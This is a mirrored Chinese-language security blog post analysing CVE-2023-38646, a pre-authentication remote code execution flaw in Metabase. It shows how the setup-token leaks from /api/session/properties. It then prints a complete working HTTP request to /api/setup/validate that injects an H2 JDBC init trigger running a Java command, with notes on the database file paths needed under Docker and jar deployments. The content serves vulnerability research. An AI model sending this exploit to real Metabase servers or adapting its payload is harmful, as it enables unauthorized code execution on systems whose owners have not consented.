CVE-2023-38646 Metabase pre-auth rce
source link: https://y4er.com/posts/cve-2023-38646-metabase-pre-auth-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVE-2023-38646 Metabase pre-auth rce
两个版本的jar
https://downloads.metabase.com/v0.46.6.1/metabase.jar
https://downloads.metabase.com/v0.46.6/metabase.jar
需要jdk11
安装的时候可以用h2的jdbc
抓包发现安装过程中有一个请求 http://192.168.1.178:3000/api/session/properties 其相应包中包含了setup-token 字段
而这个字段在配置h2 jdbc刚好用上,所以造成了未授权rce
POST /api/setup/validate HTTP/1.1
Host: 192.168.1.178:3000
Content-Length: 451
Accept: application/json
Content-Type: application/json
Cookie: metabase.DEVICE=009e2f5a-8eea-45b0-8d2d-1fafb2ee475f
Connection: close
{
"token": "41cc5e8c-d06f-4a3d-8f84-5133323b34d8",
"details": {
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules": {},
"details": {
"db": "file:./metabase.db;",
"advanced-options": true,
"ssl": true,
"init": "CREATE TRIGGER asd BEFORE SELECT ON INFORMATION_SCHEMA.tables AS '//javascript\njava.lang.Runtime.getRuntime().exec(\"calc\")'"
},
"name": "a1",
"engine": "h2"
}
}
比较坑的是jdbc的url会默认加上一个 IFEXISTS=TRUE
导致必须存在数据库文件才行,而且数据库文件名必须是xxx.mv.db
根据不同的部署方式,文件名表现不一样
docker中 /metabase.db/metabase.db.mv.db
jar包直接启动 ./metabase.db.mv.db
除了这个metabase.db还有一个/plugins/sample-database.db.mv.db
也能用,不过有些docker版本里没有。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK